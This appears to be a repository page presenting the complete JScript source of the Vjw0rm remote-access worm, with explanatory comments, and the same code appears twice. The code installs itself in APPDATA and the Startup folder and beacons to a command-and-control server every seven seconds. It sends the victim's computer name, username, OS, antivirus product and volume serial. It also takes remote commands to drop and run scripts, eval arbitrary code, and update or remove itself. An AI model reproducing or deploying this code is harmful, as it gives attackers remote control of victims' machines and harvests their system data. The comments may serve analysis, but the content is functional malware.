drole/vjw0rm

## vjw0rm

var j = [
	'WScript.Shell',
	'Scripting.FileSystemObject',
	'Shell.Application',
	'Microsoft.XMLHTTP'
];
var g = [
	'HKCU',
	'HKLM',
	'HKCU\\vjw0rm',
	'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\',
	'HKLM\\SOFTWARE\\Classes\\',
	'REG_SZ',
	'\\defaulticon\\'
];
var y = [
	'winmgmts:',
	'win32_logicaldisk',
	'Win32_OperatingSystem',
	'AntiVirusProduct'
];
var sh = Cr(0);  //'WScript.Shell'
var fs = Cr(1);  //'Scripting.FileSystemObject'
var spl = '|V|'; //command and control delimiter
var Ch = '\\';
var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number
var fu = WScript.ScriptFullName; // script fullname
var wn = WScript.ScriptName; // script name
var U;
try {      // attempts to create HKCU\\vjw0rm registry
	U = sh.RegRead(g[2]);
} catch (err) {
	var sv = fu.split('\\');
	if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name
		U = 'TRUE';
		sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE
	} else {
		U = 'FALSE';
		sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE
	}
}
Ns();  // Install malware
do {  //
	try {
		var P = Pt('Vre', '');  // send POST request to the command and control server
		P = P.split(spl);       // get command from the control server
		if (P[0] === 'Cl') {	// Cl = Close Bot script
			WScript.Quit(1);
		}
		if (P[0] === 'Sc') {  	// Sc = Save script file to %temp% and run
			var s2 = Ex('temp') + '\\' + P[2];
			var fi = fs.CreateTextFile(s2, true);
			fi.Write(P[1]);
			fi.Close();
			sh.run(s2);
		}
		if (P[0] === 'Ex') {  // Ex = execute script using Eval
			eval(P[1]);
		}
		if (P[0] === 'Rn') {  // Rn = rename bot
			var ri = fs.OpenTextFile(fu, 1);
			var fr = ri.ReadAll();
			ri.Close();
			VN = VN.split('_');
			fr = fr.replace(VN[0], P[1]);
			var wi = fs.OpenTextFile(fu, 2, false);
			wi.Write(fr);
			wi.Close();
			sh.run('wscript.exe //B "' + fu + '"');
			WScript.Quit(1);
		}
		if (P[0] === 'Up') { //Up = update bot
			var s2 = Ex('temp') + '\\' + P[2];
			var ctf = fs.CreateTextFile(s2, true);
			var gu = P[1];
			gu = gu.replace('|U|', '|V|');
			ctf.Write(gu);
			ctf.Close();
			sh.run('wscript.exe //B "' + s2 + '"', 6);
			WScript.Quit(1);
		}
		if (P[0] === 'Un') { // Un = uninstall bot
			var s2 = P[1];
			var vdr = Ex('Temp') + Ch + wn;
			var regi = 'Nothing!';
			s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi);
			eval(s2);
			WScript.Quit(1);
		}
		if (P[0] === 'RF') { // RF = same as Sc
			var s2 = Ex('temp') + '\\' + P[2];
			var fi = fs.CreateTextFile(s2, true);
			fi.Write(P[1]);
			fi.Close();
			sh.run(s2);
		}
	} catch (err) {
	}
	WScript.Sleep(7000); // phone home every 7 seconds
} while (true);
function Ex(S) {
	return sh.ExpandEnvironmentStrings('%' + S + '%');
}
function Pt(C, A) { // send POST request to command and control
	var X = Cr(3);
	X.open('POST', '<control server>' + C, false);
	X.SetRequestHeader('User-Agent:', nf()); // user agent = is the system information with the format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value>
	X.send(A);
	return X.responsetext;
}
function nf() { // get system information
	var s, NT, i;
	if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
		NT = 'YES';
	} else {
		NT = 'NO';
	}
	//system information format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value>
	s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
	return s;
}
function Cr(N) {
	return new ActiveXObject(j[N]);
}
function Ob(N) {
	var s;
	if (N == 2) {  // Get operating system
		s = GetObject(y[0]).InstancesOf(y[2]);
		var en = new Enumerator(s);
		for (; !en.atEnd(); en.moveNext()) {
			var it = en.item();
			return it.Caption;
			break;
		}
	}
	if (N == 4) { // get Antivirus prodyct installed
		var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
		s = GetObject(wmg).InstancesOf(y[3]);
		var en = new Enumerator(s);
		for (; !en.atEnd(); en.moveNext()) {
			var it = en.item();
			var str = it.DisplayName;
		}
		if (str !== '') {
			wmg = wmg + '2';
			s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct
			en = new Enumerator(s);
			for (; !en.atEnd(); en.moveNext()) {
				it = en.item();
				return it.DisplayName;
			}
		} else {
			return it.DisplayName;
		}
	}
	if (N == 6) {  // get Volume serial number
		s = GetObject(y[0]).InstancesOf(y[1]);
		var en = new Enumerator(s);
		for (; !en.atEnd(); en.moveNext()) {
			var it = en.item();
			return it.volumeserialnumber;
			break;
		}
	}
}
function Ns() {  // install bot to appdata and startup folder
	var dr = Ex('APPDATA') + Ch + wn;
	try {
		fs.CopyFile(fu, dr, true);
	} catch (err) {

	try {
		var ap = Cr(2);
		fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true);
	} catch (err) {
	}
}
}

	var j = [
	'WScript.Shell',
	'Scripting.FileSystemObject',
	'Shell.Application',
	'Microsoft.XMLHTTP'
	];
	var g = [
	'HKCU',
	'HKLM',
	'HKCU\\vjw0rm',
	'\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\',
	'HKLM\\SOFTWARE\\Classes\\',
	'REG_SZ',
	'\\defaulticon\\'
	];
	var y = [
	'winmgmts:',
	'win32_logicaldisk',
	'Win32_OperatingSystem',
	'AntiVirusProduct'
	];
	var sh = Cr(0); //'WScript.Shell'
	var fs = Cr(1); //'Scripting.FileSystemObject'
	var spl = '\|V\|'; //command and control delimiter
	var Ch = '\\';
	var VN = 'vjw0rm' + '_' + Ob(6); // bot ID - Ob(6) - Volume serial number
	var fu = WScript.ScriptFullName; // script fullname
	var wn = WScript.ScriptName; // script name
	var U;
	try { // attempts to create HKCU\\vjw0rm registry
	U = sh.RegRead(g[2]);
	} catch (err) {
	var sv = fu.split('\\');
	if (':\\' + sv[1] == ':\\' + wn) { // if first layer directory == to script name
	U = 'TRUE';
	sh.RegWrite(g[2], U, g[5]); //then set REG_SZ TRUE
	} else {
	U = 'FALSE';
	sh.RegWrite(g[2], U, g[5]); //then set REG_SZ FALSE
	}
	}
	Ns(); // Install malware
	do { //
	try {
	var P = Pt('Vre', ''); // send POST request to the command and control server
	P = P.split(spl); // get command from the control server
	if (P[0] === 'Cl') { // Cl = Close Bot script
	WScript.Quit(1);
	}
	if (P[0] === 'Sc') { // Sc = Save script file to %temp% and run
	var s2 = Ex('temp') + '\\' + P[2];
	var fi = fs.CreateTextFile(s2, true);
	fi.Write(P[1]);
	fi.Close();
	sh.run(s2);
	}
	if (P[0] === 'Ex') { // Ex = execute script using Eval
	eval(P[1]);
	}
	if (P[0] === 'Rn') { // Rn = rename bot
	var ri = fs.OpenTextFile(fu, 1);
	var fr = ri.ReadAll();
	ri.Close();
	VN = VN.split('_');
	fr = fr.replace(VN[0], P[1]);
	var wi = fs.OpenTextFile(fu, 2, false);
	wi.Write(fr);
	wi.Close();
	sh.run('wscript.exe //B "' + fu + '"');
	WScript.Quit(1);
	}
	if (P[0] === 'Up') { //Up = update bot
	var s2 = Ex('temp') + '\\' + P[2];
	var ctf = fs.CreateTextFile(s2, true);
	var gu = P[1];
	gu = gu.replace('\|U\|', '\|V\|');
	ctf.Write(gu);
	ctf.Close();
	sh.run('wscript.exe //B "' + s2 + '"', 6);
	WScript.Quit(1);
	}
	if (P[0] === 'Un') { // Un = uninstall bot
	var s2 = P[1];
	var vdr = Ex('Temp') + Ch + wn;
	var regi = 'Nothing!';
	s2 = s2.replace('%f', fu).replace('%n', wn).replace('%sfdr', vdr).replace('%RgNe%', regi);
	eval(s2);
	WScript.Quit(1);
	}
	if (P[0] === 'RF') { // RF = same as Sc
	var s2 = Ex('temp') + '\\' + P[2];
	var fi = fs.CreateTextFile(s2, true);
	fi.Write(P[1]);
	fi.Close();
	sh.run(s2);
	}
	} catch (err) {
	}
	WScript.Sleep(7000); // phone home every 7 seconds
	} while (true);
	function Ex(S) {
	return sh.ExpandEnvironmentStrings('%' + S + '%');
	}
	function Pt(C, A) { // send POST request to command and control
	var X = Cr(3);
	X.open('POST', '<control server>' + C, false);
	X.SetRequestHeader('User-Agent:', nf()); // user agent = is the system information with the format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value>
	X.send(A);
	return X.responsetext;
	}
	function nf() { // get system information
	var s, NT, i;
	if (fs.fileexists(Ex('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
	NT = 'YES';
	} else {
	NT = 'NO';
	}
	//system information format: vjw0rm_<volume serial number>\<Username>\<OS name>\<AV product installed>\<VBC.exe installed - boolean>\<HKCU\\vjw0rm value>
	s = VN + Ch + Ex('COMPUTERNAME') + Ch + Ex('USERNAME') + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;
	return s;
	}
	function Cr(N) {
	return new ActiveXObject(j[N]);
	}
	function Ob(N) {
	var s;
	if (N == 2) { // Get operating system
	s = GetObject(y[0]).InstancesOf(y[2]);
	var en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	var it = en.item();
	return it.Caption;
	break;
	}
	}
	if (N == 4) { // get Antivirus prodyct installed
	var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
	s = GetObject(wmg).InstancesOf(y[3]);
	var en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	var it = en.item();
	var str = it.DisplayName;
	}
	if (str !== '') {
	wmg = wmg + '2';
	s = GetObject(wmg).InstancesOf(y[3]); //y[3] = AntiVirusProduct
	en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	it = en.item();
	return it.DisplayName;
	}
	} else {
	return it.DisplayName;
	}
	}
	if (N == 6) { // get Volume serial number
	s = GetObject(y[0]).InstancesOf(y[1]);
	var en = new Enumerator(s);
	for (; !en.atEnd(); en.moveNext()) {
	var it = en.item();
	return it.volumeserialnumber;
	break;
	}
	}
	}
	function Ns() { // install bot to appdata and startup folder
	var dr = Ex('APPDATA') + Ch + wn;
	try {
	fs.CopyFile(fu, dr, true);
	} catch (err) {

	try {
	var ap = Cr(2);
	fs.CopyFile(fu, ap.NameSpace(7).Self.Path + '\\' + wn, true);
	} catch (err) {
	}
	}
	}